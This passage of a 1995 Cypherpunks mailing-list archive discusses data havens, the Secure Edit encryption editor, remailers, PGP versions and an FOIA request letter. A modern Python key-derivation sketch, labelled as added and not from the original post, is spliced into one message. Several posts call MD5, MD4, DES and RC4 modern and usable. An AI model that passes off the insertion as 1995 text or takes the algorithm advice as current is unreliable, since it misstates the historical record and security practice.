pstemari at erinet.com From adamfast at seanet.com Thu Jan 12 18:15:04 1995 From: adamfast at seanet.com (Adam Feuer) Date: Thu, 12 Jan 95 18:15:04 PST Subject: essential characteristics of a Data Haven Message-ID: folks, looking thru the cyphernomicon, this is about all i could come up with for characteristics of a data haven: |16.22. Data Havens | 16.22.1. "What are data havens?" | + Places where data can be hidden or protected against legal | action. 
| - Sterling, "Islands in the Net," 1988

anyone have a list of the essential characteristics of a data haven? what differentiates a "data haven" from "reasonably secure offsite storage"?

here's my attempt at a working definition:

a "data haven"...

1. "securely" stores data files for remote users.
2. will only allow "authorized" entities to store files in the data haven.
3. will only allow "owners" of the files to withdraw their files from the data haven.
4. differentiates "authorized" entities from "non-authorized" ones, and "owners" from "non-owners", only by means of cryptographic keys.

terms i left undefined are "securely," "authorized," and "owner."

by "secure" i imagine a DH will attempt to prevent its data from being destroyed, or read by anyone other than the data's "owner."

by "authorized" i imagine that a DH will not want to accept data from just anyone. (for instance, people who don't pay.)

by "owner" i mean the specific "authorized" entity that stored the data in the DH.

i imagine that most DH's will need to accept digital cash to be able to operate. is this an essential characteristic of a cp data haven?

what did i leave out?

adam
adamfast at seanet.com

From rrothenb at libws4.ic.sunysb.edu Thu Jan 12 19:21:04 1995
From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg)
Date: Thu, 12 Jan 95 19:21:04 PST
Subject: How "good" is MDC?
Message-ID: <9501130321.AA03497@toad.com>

I've been toying with a homegrown implementation of the MDC algorithm, similar to the one used in HPack, written mostly in 386 assembler though. My version also scrambles the constants by multiple cycles over the key, so it should be better than the vanilla MD5... I'm wondering how "secure" MDC is, though... are there better hashing algorithms or possible modifications that could be made?

(A silly question considering I haven't yet released the sources. When they are ready I'll post an announcement or something.)
Rob

From m00012 at KANGA.STCLOUD.MSUS.EDU Thu Jan 12 19:21:32 1995
From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU)
Date: Thu, 12 Jan 95 19:21:32 PST
Subject: Keyboard sniffer source code
Message-ID: <0098A5EA.FA888140.1@KANGA.STCLOUD.MSUS.EDU>

Not to be paranoid, but did anybody receive that program? Does cypherpunkcs at toad.com have a pgp key? I think it was intercepted.

mike

From tjb at acpub.duke.edu Thu Jan 12 19:25:28 1995
From: tjb at acpub.duke.edu (Tom Bryce)
Date: Thu, 12 Jan 95 19:25:28 PST
Subject: RELEASE: Secure Edit beta 0.5
Message-ID:

Ben Goren wrote:

>At 5:18 PM 1/12/95, Tom Bryce wrote:
>>[. . .]
>>* the salt is concatenated with MD5[passphrase] many times and this
>>concatenated string hashed to generate the 'session key' for the file
>>from your pass phrase. The number of times it is concatenated is
>>calibrated to make it take about half a second - not a big performance
>>loss, but it makes brute force attack of weak passphrases up to
>>thousands of times more costly.
>>[. . . .]
>
>This is only going to work if MD5 is not a "group"--that is, if there is no
>simple algorithm which is equivalent to md5(md5(x)). I doubt that's been
>proven.

This is not exactly what secure edit does. It hashes in the following manner to generate a session key:

    MD5 [ (128-bit salt)
          MD5[passphrase] 0
          MD5[passphrase] 1
          MD5[passphrase] 2
          ... ]

to get the session key. The 0, 1, 2 is a single byte. So there is only one level of nesting of the hashes. This is actually a common and well-regarded technique for increasing the security of weak passphrases.
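Added example (not from the original post and not Secure Edit's source code): a Python sketch of the session-key construction described above, with the half-second calibration, and PBKDF2 from the standard library beside it for comparison. The function names, the wrap-around of the one-byte counter past 255 and the doubling calibration loop are assumptions.

```python
import hashlib
import os
import time


def derive_session_key(passphrase: bytes, salt: bytes, count: int) -> bytes:
    """MD5[ salt | MD5[passphrase] 0 | MD5[passphrase] 1 | ... ], `count` repeats."""
    if len(salt) != 16:
        raise ValueError("salt must be 128 bits, as in the post")
    if count < 1:
        raise ValueError("count must be at least 1")
    inner = hashlib.md5(passphrase).digest()  # the single level of nesting
    outer = hashlib.md5(salt)
    for i in range(count):
        # Assumption: the one-byte counter wraps modulo 256 on long runs.
        outer.update(inner + bytes([i & 0xFF]))
    return outer.digest()  # 16 bytes, the size of an IDEA key


def calibrate(target_seconds: float, start: int = 1024, limit: int = 1 << 24) -> int:
    """Double the repeat count until one derivation costs about target_seconds."""
    count = start
    while count < limit:
        began = time.perf_counter()
        derive_session_key(b"calibration passphrase", bytes(16), count)
        if time.perf_counter() - began >= target_seconds:
            break
        count *= 2
    return count


def guesses_per_second(count: int, trials: int = 3) -> float:
    """Measured rate at which this machine can test candidate passphrases."""
    salt = os.urandom(16)
    began = time.perf_counter()
    for n in range(trials):
        derive_session_key(b"candidate-%d" % n, salt, count)
    return trials / (time.perf_counter() - began)


def derive_pbkdf2(passphrase: bytes, salt: bytes, iterations: int) -> bytes:
    """Standardized construction for comparison: PBKDF2-HMAC-SHA256, 128-bit key."""
    return hashlib.pbkdf2_hmac("sha256", passphrase, salt, iterations, dklen=16)


if __name__ == "__main__":
    count = calibrate(0.5)
    salt_a, salt_b = os.urandom(16), os.urandom(16)
    phrase = b"constructed sample passphrase"
    print("calibrated repeat count:", count)
    print("file A key:", derive_session_key(phrase, salt_a, count).hex())
    print("file B key:", derive_session_key(phrase, salt_b, count).hex())
    print("guesses/sec, stretched:", round(guesses_per_second(count), 2))
    print("guesses/sec, one repeat:", round(guesses_per_second(1, trials=2000)))
    print("PBKDF2 key:", derive_pbkdf2(phrase, salt_a, 100_000).hex())
```

The two file keys differ although the passphrase is the same, which is the effect of the per-file salt; the ratio between the two guess rates is the slowdown a passphrase-guessing attacker on the same hardware would see.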
Tom ------------------------------------------------------------------------ /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\ | Tom Bryce |____| ___ | Duke Med | ___ {~._.~} | tjb at acpub.duke.edu | {~._.~) ( Y ) | PGP keys: finger tjbryce at amherst.edu | ( Y ) ()~*~() |personal:9B6088464ED86413 0F5E55E45CF1C961| ()~*~() (_)-(_) |miyako | (_)-(_) |software:02646F0B06DCFE03 E6DD367DB4E1010F| /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ | \_________________________________________\__/ From tjb at acpub.duke.edu Thu Jan 12 19:33:07 1995 From: tjb at acpub.duke.edu (Tom Bryce) Date: Thu, 12 Jan 95 19:33:07 PST Subject: RELEASE: secure edit, resend (was bad pgp signature) Message-ID: It's been brought to my attention that I messed up and the pgp signature did not validate my post about secure edit. I'm not sure where exactly I messed up, but here goes again... sorry for sending it twice. :( -----BEGIN PGP SIGNED MESSAGE----- RELEASE: secure edit beta 0.5 for Macintosh Miyako Software has released an improved version of secure edit. It is now available for FTP from ripem.msu.edu in the directory pub/crypt/mac, and at other ITAR-compliant sites. Finger tjbryce at amherst.edu for an updated site list, as well as information on other products by miyako software. All releases are signed with the Miyako Software public PGP key. 
Version b0.5 sports the following new features: FOR EASE OF USE AND UTILITY: * extensive balloon help * an undo command * print command * a find command (useful for storing sensitive information with secure edit) * windows menu with tile and stack commands * copy with line breaks inserted, for composing email or pgp messages * much better and faster compression and a smaller base file size * secure edit now uses Colin Plumb's fast 68k assembly IDEA implementation * you can turn off the annoying � marks * the menu blinking clunky has been fixed * the window update annoyance has been fixed * various interface clunkies have been fixed * new and more intuitive icons have been drawn FOR SECURITY: * much better random number management using the code written by Colin Plumb for PGP * random data is snarfed from all events the application observes (such as your keystrokes), the time these events occur, and by continuously tracking your mouse position, even when backgrounded. the pool of random data is maintained between sessions and is encrypted based on these random events before it is written to disk and before use. * so that every file is encrypted on a different IDEA key, making cryptanalysis of one useless agaist others, your key is salted with 128 bits of random data, stored in the clear for decryption, to make a 'session key'. thus, the key used to encrypt every file will be different, even if you used the same passphrase. this makes cryptanalysis of one file useless against others. * the salt is concatenated with MD5[passphrase] many times and this concatenated string hashed to generate the 'session key' for the file from your pass phrase. The number of times it is concatenated is calibrated to make it take about half a second - not a big performance loss, but it makes brute force attack of weak passphrases up to thousands of times more costly. 
* semi-splay compression is utilized, which is faster than the lame old compression (written by me :( ) and which gets >50% file reduction. It strengthens the encryption by reducing the redundancy in the plaintext. It also continually modifies the compression encoding system based on the data as it goes along, making the interpretation of compressed data dependent on the data that has come before it * you can verify keys against Curve Encrypt keyfiles * documents that are saved in plaintext format clearly distinguished by "TEXT:" in the window title * the source code has been cleaned up :-) and much improved to make it easier to verify yourself that the program is strong and secure. ------THE BASICS------ (from version a 0.3.4) SECURE EDIT is an editor designed for editing sensitive text buffers. It is designed to prevent plaintext from ever being written to disk, even if only momentarily. You might fail to overwrite or encrypt such plaintext properly, or your opponent might be able to retrieve some of the information even though you wiped it (see docs for details). Word Processors generally create temp and scratch files that leave plaintext on your drive whether you like it or not. Secure edit fixes this problem. Sometimes you need to quit in a hurry and have all your data encrypted and saved. Or you might prefer to have your files encrypted at all times so that you never forget to re-encrypt a file you worked on, and so that files are never in plaintext form while you are working with them. Secure edit sports the following features to serve these and other data security needs: * Plaintext is never written to disk - Secure Edit locks all sensitive buffers in memory so that virtual memory will never swap them to disk. This includes the text you are editing as well as any encryption keys in use. 
* Secure Edit never creates plaintext temp or scratch files * Secure Edit offers the option of saving files directly in encrypted format so you never have plaintext on the hard drive. * Your data is compressed and encrypted in RAM with the IDEA algorithm, then written to disk in encrypted format. * Secure Edit can mantain a secure, private clipboard, interconverting with the system clipboard only when you use OPTION-cut,copy, and paste. This prevents the system from getting a copy of your sensitive data and possibly writing it to disk, or leaving it around for another user to see. * Secure Edit can open foreign text files, and DOD wipe them on request when you save the file in encrypted format. * Secure Edit offers a default passphrase option so you only need to enter your passphrase once. It also offers the option of validating your phrase against secure validation information that can be used to check that you have entered your standard pass phrase, but which cannot be used to recover the passphrase. This prevents you from saving under a bad passphrase and losing data. * Secure Edit offers a time-out option, whereby it will save all files and quit after a certain idle time period * Secure Edit offers an option-quit feature, whereby it will assume it is okay to save all files, and save and quit as quickly as possible * Secure Edit is available to U.S. citizens in the U.S. at an ITAR-compliant site near you. I'm presently uploading it to ripem.msu.edu and others. * source code is, of course, available. * Questions about Secure Edit should be directed to me, at Thanks for your attention. Tom Bryce /////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *---------------------------------------------------------* Miyako Software is dedicated to creating freeware to help make computers tools of personal liberation and expression. 
for product info and PGP key, finger email: *---------------------------------------------------------* \\\\\\\\\\\\\\\\\\\\\\\\\\\\\_///////////////////////////// From Paul.Foley at vuw.ac.nz Thu Jan 12 19:33:57 1995 From: Paul.Foley at vuw.ac.nz (Paul Foley) Date: Thu, 12 Jan 95 19:33:57 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: <199501130333.QAA03633@akeake.its.vuw.ac.nz> Black Unicorn wrote: >> This is EXACTLY what I was contemplating. I really wish they would >> implement it. Then I can get the traveler's cheques out of my wallet. >> (unsigned in both spots of, course.) > >Is this not essentially the same as the current pre-paid long distance >Phone cards on the market? > >One would think the transition as easy for the credit card companies to >make with a secured, disposable visa card. NZ Telecom are conducting an experiment with using phonecards in softdrink vending machines. There was an article in The Dominion newspaper's _InfoTech_ magazine crying out for the Government to stop it, claiming Telecom's creating an independant (from the Reserve Bank) currency, will destroy the New Zealand economy, etc., etc. --- Paul Foley ----- PGP encrypted mail preferred PGP key available from keyservers or finger (finger pfoley at akeake.its.vuw.ac.nz) From lce at wwa.com Thu Jan 12 19:49:37 1995 From: lce at wwa.com (Larry E) Date: Thu, 12 Jan 95 19:49:37 PST Subject: How do I know if its encrypted? In-Reply-To: <9501130137.AA03281@eri.erinet.com> Message-ID: In article <9501130137.AA03281 at eri.erinet.com>, pstemari at erinet.com (Paul J. Ste. Marie) wrote: > At 10:08 PM 1/11/95 -0800, Eric Hughes wrote: > > ...
Seems to me that a quite reasonable condition of use of a remailer is > >that what is passed isn't human readable. > > Perhaps I missed this, but why? If someone is going to plant kiddie porn or > whatever on you, does it really matter if they encrypt it first or not? > The goal is to convince the two groups of concerned parties that the remailer operators don't know the contents of what's passing through their remailers: (1) the people who use the remailer, who get a measure of comfort from knowing their communication is secure (2) legal groups etc. who may try to hold the remailer liable in some way for what passes through their remailer. A large percentage of material that passes through remailers might be offensive to SOMEONE---if even just because an unpopular opinion is expressed. The remailers are operated by people who want to promote information flow, not restrict it. They provide an important service that is of critical importance to some people and groups who use the net. They shouldn't be held accountable for the few who abuse the remailers, and encryption helps prevent that from happening. From chen at intuit.com Thu Jan 12 19:49:56 1995 From: chen at intuit.com (Mark Chen) Date: Thu, 12 Jan 95 19:49:56 PST Subject: Crypto functions In-Reply-To: <199501102139.QAA00961@bb.hks.net> Message-ID: <9501122119.AA05796@doom.intuit.com> > What crypto functions are considered modern and usable? The list I have > right now is: > > RSA > IDEA > DES > 3DES > RC4 > RC5 > BLOWFISH > MD4 > MD5 > > (and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars > with "flamingo".) > > Pointers to code for any other schemes will be greatly appreciated. You might want to include LUC, even though it is fairly new and extremely cumbersome to implement (though, I would say, not outright unusable). Among symmetric ciphers, there's GOST. And I'd count SHA as a reliable hash function. 
-- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From tjb at callisto.acpub.duke.edu Thu Jan 12 20:56:57 1995 From: tjb at callisto.acpub.duke.edu (tjb) Date: Thu, 12 Jan 95 20:56:57 PST Subject: RELEASE: Secure Edit beta 0.5 (again!) Message-ID: <199501130455.XAA28049@mail.duke.edu> I again apologize for sending this a THIRD time, but we all agree it's important for PGP signatures to verify properly or people will get sloppy about verifying them and expecting them to be valid. I strongly suspect Eudora is doing some formatting of the email when I send it with Eudora, so I'm sending this post through internews instead. This really should work - I always paste it first in here, then check the signature on the clipboard with macpgp. It checks out fine, but when I send it to the list, the signature doesn't verify again. Tom -----BEGIN PGP SIGNED MESSAGE----- RELEASE: secure edit beta 0.5 for Macintosh Miyako Software has released an improved version of secure edit. It is now available for FTP from ripem.msu.edu in the directory pub/crypt/mac, and at other ITAR-compliant sites. Finger tjbryce at amherst.edu for an updated site list, as well as information on other products by miyako software. All releases are signed with the Miyako Software public PGP key. 
Version b0.5 sports the following new features: FOR EASE OF USE AND UTILITY: * extensive balloon help * an undo command * print command * a find command (useful for storing sensitive information with secure edit) * windows menu with tile and stack commands * copy with line breaks inserted, for composing email or pgp messages * much better and faster compression and a smaller base file size * secure edit now uses Colin Plumb's fast 68k assembly IDEA implementation * you can turn off the annoying � marks * the menu blinking clunky has been fixed * the window update annoyance has been fixed * various interface clunkies have been fixed * new and more intuitive icons have been drawn FOR SECURITY: * much better random number management using the code written by Colin Plumb for PGP * random data is snarfed from all events the application observes (such as your keystrokes), the time these events occur, and by continuously tracking your mouse position, even when backgrounded. the pool of random data is maintained between sessions and is encrypted based on these random events before it is written to disk and before use. * so that every file is encrypted on a different IDEA key, making cryptanalysis of one useless agaist others, your key is salted with 128 bits of random data, stored in the clear for decryption, to make a 'session key'. thus, the key used to encrypt every file will be different, even if you used the same passphrase. this makes cryptanalysis of one file useless against others. * the salt is concatenated with MD5[passphrase] many times and this concatenated string hashed to generate the 'session key' for the file from your pass phrase. The number of times it is concatenated is calibrated to make it take about half a second - not a big performance loss, but it makes brute force attack of weak passphrases up to thousands of times more costly. 
* semi-splay compression is utilized, which is faster than the lame old compression (written by me :( ) and which gets >50% file reduction. It strengthens the encryption by reducing the redundancy in the plaintext. It also continually modifies the compression encoding system based on the data as it goes along, making the interpretation of compressed data dependent on the data that has come before it * you can verify keys against Curve Encrypt keyfiles * documents that are saved in plaintext format clearly distinguished by "TEXT:" in the window title * the source code has been cleaned up :-) and much improved to make it easier to verify yourself that the program is strong and secure. ------THE BASICS------ (from version a 0.3.4) SECURE EDIT is an editor designed for editing sensitive text buffers. It is designed to prevent plaintext from ever being written to disk, even if only momentarily. You might fail to overwrite or encrypt such plaintext properly, or your opponent might be able to retrieve some of the information even though you wiped it (see docs for details). Word Processors generally create temp and scratch files that leave plaintext on your drive whether you like it or not. Secure edit fixes this problem. Sometimes you need to quit in a hurry and have all your data encrypted and saved. Or you might prefer to have your files encrypted at all times so that you never forget to re-encrypt a file you worked on, and so that files are never in plaintext form while you are working with them. Secure edit sports the following features to serve these and other data security needs: * Plaintext is never written to disk - Secure Edit locks all sensitive buffers in memory so that virtual memory will never swap them to disk. This includes the text you are editing as well as any encryption keys in use. 
* Secure Edit never creates plaintext temp or scratch files * Secure Edit offers the option of saving files directly in encrypted format so you never have plaintext on the hard drive. * Your data is compressed and encrypted in RAM with the IDEA algorithm, then written to disk in encrypted format. * Secure Edit can mantain a secure, private clipboard, interconverting with the system clipboard only when you use OPTION-cut,copy, and paste. This prevents the system from getting a copy of your sensitive data and possibly writing it to disk, or leaving it around for another user to see. * Secure Edit can open foreign text files, and DOD wipe them on request when you save the file in encrypted format. * Secure Edit offers a default passphrase option so you only need to enter your passphrase once. It also offers the option of validating your phrase against secure validation information that can be used to check that you have entered your standard pass phrase, but which cannot be used to recover the passphrase. This prevents you from saving under a bad passphrase and losing data. * Secure Edit offers a time-out option, whereby it will save all files and quit after a certain idle time period * Secure Edit offers an option-quit feature, whereby it will assume it is okay to save all files, and save and quit as quickly as possible * Secure Edit is available to U.S. citizens in the U.S. at an ITAR-compliant site near you. I'm presently uploading it to ripem.msu.edu and others. * source code is, of course, available. * Questions about Secure Edit should be directed to me, at Thanks for your attention. Tom Bryce /////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *---------------------------------------------------------* Miyako Software is dedicated to creating freeware to help make computers tools of personal liberation and expression. 
for product info and PGP key, finger email: *---------------------------------------------------------* \\\\\\\\\\\\\\\\\\\\\\\\\\\\\_///////////////////////////// From sdw at lig.net Thu Jan 12 20:58:31 1995 From: sdw at lig.net (Stephen D. Williams) Date: Thu, 12 Jan 95 20:58:31 PST Subject: time stamping service (again) In-Reply-To: Message-ID: > > -----BEGIN PGP SIGNED MESSAGE----- > > My PGP based time stamping service is back online. I took it > down a while ago thinking the folks at notary.com (Digital > Time-Stamp, Inc.) were going to release their commercial ... This is elegant and great... Why don't we add to the todo list the following: Let's package up a number of the self-contained services, code, etc. into a bundle that can be installed all at once (say on a Linux system :-) ) and call it the 'CypherStation' release. We can try to reach a concensus for standard service naming/access methods and create a federation of these things. It should have minimize bandwidth, minimize cpu, minimize storage levels of service to allow different levels of users to have different possible impact on the machine. (Ie. : local, paying, regional, unknown, domain, etc.) I know that those of us running Internet services would devote a little of our imaginary free time. We could have a string to identify available services and versions: CypherStation/.01/Serv:RTAmAh1.3 Where each service could have versions that differed from the release. Just some raw thought. sdw -- Stephen D.
Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From skaplin at mirage.skypoint.com Thu Jan 12 21:19:50 1995 From: skaplin at mirage.skypoint.com (Samuel Kaplin) Date: Thu, 12 Jan 95 21:19:50 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 12 Jan 1995 17:09:33 -0800 (PST), Syed Yusuf wrote: > > > On Wed, 11 Jan 1995, Samuel Kaplin wrote: > > > I hope they took you someplace nice for lunch...You might want to file a > > FOI request on yourself, just to see how much they censor. ;) They might > > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) > > > > For the benifit of myself and the list, how would you go about doing that? Fill out this form letter, get it notarized and send it to the address in the letterhead. Be prepared to wait and get jerked around. I have heard that some FOI requests have taken as long as two years to get back. Sam PRIVACY ACT & FREEDOM OF INFORMATION ACT REQUEST (date) (requester's name and address) Federal Bureau of Investigation Records Management Division - FOIA/PA Office 9th & Pennsylvania Avenue NW Washington, DC 20535 Gentlemen: This is a request for records under the provisions of both the Privacy Act (5 USC 552b) and the Freedom of Information Act (5 USC 522). This request is being made under both Acts. I hereby request one copy of any and all records about me or referencing me maintained at the FBI. 
This includes (but should not be limited to) documents, reports, memoranda, letters, electronic files, database references, "do not file" files, photographs, audio tapes, videotapes, electronic or photographic surveillance, "june mail", mail covers, and other miscellaneous files, and index citations relating to me or referencing me in other files. My full name is:___________________________________ My date of birth was______________ My place of birth was:______________________________ My social security #:______________ I have lived in these places: Other names, places, events, organizations or other references under which you may find applicable records: As you know, FOIA/PA regulations provide that even if some requested material is properly exempt from mandatory disclosure, all segregable portions must be released. If the requested material is released with deletions, I ask that each deletion be marked to indicate the exemption(s) being claimed to authorize each particular withholding. In addition, I ask that your agency exercise its discretion to release any records which may be technically exempt, but where withholding serves no important public interest. I hereby agree to pay reasonable costs associated with this request up to a maximum of $25 without my additional approval. However, I strongly request a fee waiver because this is, in part, a Privacy Act request. This letter and my signature have been certified by a notary public as marked below. Sincerely, _____________________________________________ requester's signature _____________________________________________ requester's printed name _____________________________________________ notary stamp and signature - -- ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) 
                                        |
E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard
Finger skaplin at mirage.skypoint.com   | outside a Roman brothel.
==============================================================================

Ambition is a poor excuse for not having sense enough to be lazy.
        -- Charlie McCarthy --

From ianf at sydney.sgi.com Thu Jan 12 21:46:02 1995
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Thu, 12 Jan 95 21:46:02 PST
Subject: Crypto functions
In-Reply-To: <9501122119.AA05796@doom.intuit.com>
Message-ID: <9501131633.ZM23442@wiley.sydney.sgi.com>

On Jan 12, 1:21pm, Mark Chen wrote:
> Among symmetric ciphers, there's GOST.

Using which S-boxes though? Matt posted a set a while ago, although I
suspect they were the ones the Soviet public got, and probably not
overly secure.

Add the latest (91 I think) version LOKI to the list. Only a 64 bit key,
but still not bad, reasonably well studied, and free.

Ian.

From crunch at well.sf.ca.us Thu Jan 12 21:51:26 1995
From: crunch at well.sf.ca.us (John Draper)
Date: Thu, 12 Jan 95 21:51:26 PST
Subject: Some PGP problems
Message-ID: <199501130551.VAA01278@well.sf.ca.us>

Hi,

I'm trying to decode a PGP file that was created with Ver 2.6.
At this time, I thought that my older ver 2.1c (Running on a
Mac) would at least be able to decrypt something made from
a higher version, running on a PC. Apparently that is not so.
So, the next thing I did, or what any self respecting
Cypherpunk might do, is to go out on the net and look
for a later version to FTP. Well, after discovering
that soda.berkeley.edu don't exist anymore, I eventually
found the ftp site where it lives. ftp.csua.berkeley.edu.

I learn that Mac PGP2.3 exists, but NO version 2.6
exists for the Mac. Is that true? If not, then
where can I get a copy, so I can decode a message
created with 2.6? If ver 2.3 will decode a message
encoded with 2.6, then I'm faced with how I can
extract this Mac file which has a .gz extension.
Binhex don't seem to decode it. So, I now got this
file named "macpgp2.3.cpt.hqx.gz" on my Mac. Was
I supposed to have used some special UNIX utility to
convert the .gz thingie first? Please enlighten
this confused cypherpunker!!! :-) Or will I even have
to do all of this because 2.3 is incompatible with 2.6.

C. Crunch

From ianf at sydney.sgi.com Thu Jan 12 22:01:10 1995
From: ianf at sydney.sgi.com (Ian Farquhar)
Date: Thu, 12 Jan 95 22:01:10 PST
Subject: FBI and BLACKNET
In-Reply-To:
Message-ID: <9501131639.ZM23450@wiley.sydney.sgi.com>

On Jan 12, 11:05pm, Samuel Kaplin wrote:
> Fill out this form letter, get it notarized and send it to the address in
> the letterhead. Be prepared to wait and get jerked around. I have heard
> that some FOI requests have taken as long as two years to get back.

Although the FBI only have jurisdiction within the US, it is quite possible
that they would have files containing information about non-US nationals if
they were involved (perhaps even peripherally) in domestic FBI
investigations.

I wonder what would happen if a non-US citizen logged an FOI request? Has
anyone ever tried?

Ian.

From jamesd at netcom.com Thu Jan 12 22:02:15 1995
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 12 Jan 95 22:02:15 PST
Subject: Purpose of Data Havens
In-Reply-To: <199501121810.NAA25089@bb.hks.net>
Message-ID:

On Thu, 12 Jan 1995, L.
McCarthy wrote: > Scenario: June is a test engineer at Rockwell Intl. At the lab where she works, > it is observed that some rubber O-rings being designed for the space shuttle > are liable to crack, and lose their airtight seal, when exposed to the > extremely low temperatures of space. The project is behind, so the researchers > are instructed to proceed in spite of the problem. June encrypts the test > results and deposits them in a data haven. Digression: The interesting thing is that NASA was damn near able to keep this matter secret despite the projects chief engineer kicking and screaming. When Feynman wandered in to Morton Thiokol and started asking questions he was not met with a cover up -- instead he was told the whole story, complete with the chart that lead the chief booster engineer, with the support of the entire engineering team, to send email and written reports that the Challenger would blow up unless the launch was delayed. And despite one of the worlds most famous scientists knowing the truth, and despite the fact that he was the only scientist on the commission of enquiry, they still might well have kept it quiet if Feynman had not ambushed them on TV. And despite Feynmans ambush, they still managed pretty good damage control. Of course today such a cover up would never succeed -- someone would just mail it to the internet, and the story would blow. But the fact is the cover up largely succeeded despite the efforts of the Chief engineer (which got him blacklisted) and despite the theatric efforts of one of the worlds most eminent scientists, perhaps the most eminent living scientist of that time. It makes me realize that the world has already changed, vastly for the better, and those in power do not yet realize it. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we http://nw.com/jamesd/ are. 
True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com From tjb at acpub.duke.edu Thu Jan 12 23:11:35 1995 From: tjb at acpub.duke.edu (Tom Bryce) Date: Thu, 12 Jan 95 23:11:35 PST Subject: signature business for secure edit release announce Message-ID: I'm not going to waste any more bandwidth sending the announcement (sorry), but here's how you can validate the signature if you'd like to. If you'd like to verify the signature on the announcement for secure edit, please finger me at tjbryce at amherst.edu. In my plan is contained the announcement with a valid signature from Miyako Software's public key. Even though I had "treat source file as text" selected, I think there must have been left over some weird character in there that is not transmitted through email properly. What I did to get the signature to validate was place the announcement in my plan at amherst.edu, finger myself, copy the signed announcement, detach the invalid signature with mac pgp, sign the leftover text and copy just the resulting signature, log back onto amherst, and I edited the plan.txt file, pasting the new signature onto where the old signature used to be. FINALLY WORKED! Sincere apologies for using THREE TIMES the bandwidth the message actually needed, and not even getting it to work at that. Thanks to Bill Evans for checking out the signature and noticing it was invalid. Tom From adam at bwh.harvard.edu Thu Jan 12 23:44:32 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 12 Jan 95 23:44:32 PST Subject: Some PGP problems In-Reply-To: <199501130551.VAA01278@well.sf.ca.us> Message-ID: <199501130743.CAA24613@bwh.harvard.edu> There are two versions of MacPGP that use RSAREF, and are thus legal & kosher, plus Viacrypts. The free ones are MIT, and 2.6.2ca. The MIT one doesn't support Apple Events. The Apple event supporting PGP's can be driven by a menu interface called the MacPGP kit. 
2.3 is not fully compatible with 2.6; I use 2.6.2 with the kit. MIT: telnet net-dist.mit.edu, login as getpgp server.netcom.com:/pub/gr/grady/PGP/MacPGP262b1.2.sea.hqx.asc) duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPKit.hqx You were supposed to use gunzip (GNU's unzip) to unzip, but Stufit deluxe will handle it; just tell Stuffit its a zipped file. Crunch asked: | I learn that Mac PGP2.3 exists, but NO version 2.6 | exists for the Mac. Is that true? If not, then | where can I get a copy, so I can decode a message | created with 2.6? If ver 2.3 will decode a message | encoded with 2.6, then I'm faced with how I can | extract this Mac file which has a .gz extension. | Binhex don't seem to decode it. So, I now got this | file named "macpgp2.3.cpt.hqx.gz" on my Mac. Was | I supposed to have used some special UNIX itility to | convert the .gz thingie first? Please emlighten | this confused cypherpunker!!! :-) Or will I even have | to do all of this because 2.3 is incompatable with 2.6. -- "It is seldom that liberty of any kind is lost all at once." -Hume From root at nesta.pr.mcs.net Fri Jan 13 00:02:25 1995 From: root at nesta.pr.mcs.net (Nesta Stubbs) Date: Fri, 13 Jan 95 00:02:25 PST Subject: Data Havens..A consumer perspective In-Reply-To: <199501121637.IAA00893@largo.remailer.net> Message-ID: On Thu, 12 Jan 1995, Eric Hughes wrote: > why would you give the haven owner free run? I mean naturally he does > have free run with your data once he gets it, > > That's exactly the reason, namely, to make the agreement between > individuals match the underlying nature of information. This is > different in the trust in silence about the user. This is also not to > say that the operator can't undertake to make assurances about where > bits go and don't go. > are you saying that there is an agreement between the data haven operator and the user? If so, that's one of the things i was attmeting to point out in that reply. 
I think the agreement, whether it is a contract, not likely, or a sense
of trust is extremely important to the data-haven.

> I am sure you
> wouldn't want your data stored on a public access Unix system, or in
> plaintext.
>
> So don't store it in plaintext. The operator of the data storage
> facility has no responsibility for this.
>
Right now we are getting into so many fraggin different definitions of
data haven, that this conversation is looping over itself infinitely. In
one sort of data Haven, the operator does have a responsibility to keep
the data private, yet on another, he doesn't have the responsibility, it
all depends on what the aims and views and goals of the DataHaven are.
And since we have not yet agreed on what a data Haven.....we get usenet
run-around.

> if the datahaven is turned into a data broker
>
> I don't know about you, but I don't like paying money for random bits.
>
this ties into the above line, maybe you aren't just sending encrypted
data, maybe you're selling secrets to a datahaven operator, who is
offshore, or who has the money to pay you know, and also the structure
set up to receive, transmit, and take payment and pay for that secret
data, or valuable info. Once again I think that we are working with
multiple definitions of DataHaven here, and it is leading to confusions.

> well what would be the purpose of this data haven you propose except as a
> extra storage space for data, like if you don't have space on your own
> drive?
>
> Even when you've got enough of your own disk space, it's still subject
> to failure. Putting data in multiple places reduces the possibility
> of unrecoverable catastrophe.
>
there are already services much better equipped to deal with this
problem, although, I am unsure if any of them are crypto-aware as of
yet. Something to look into.
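
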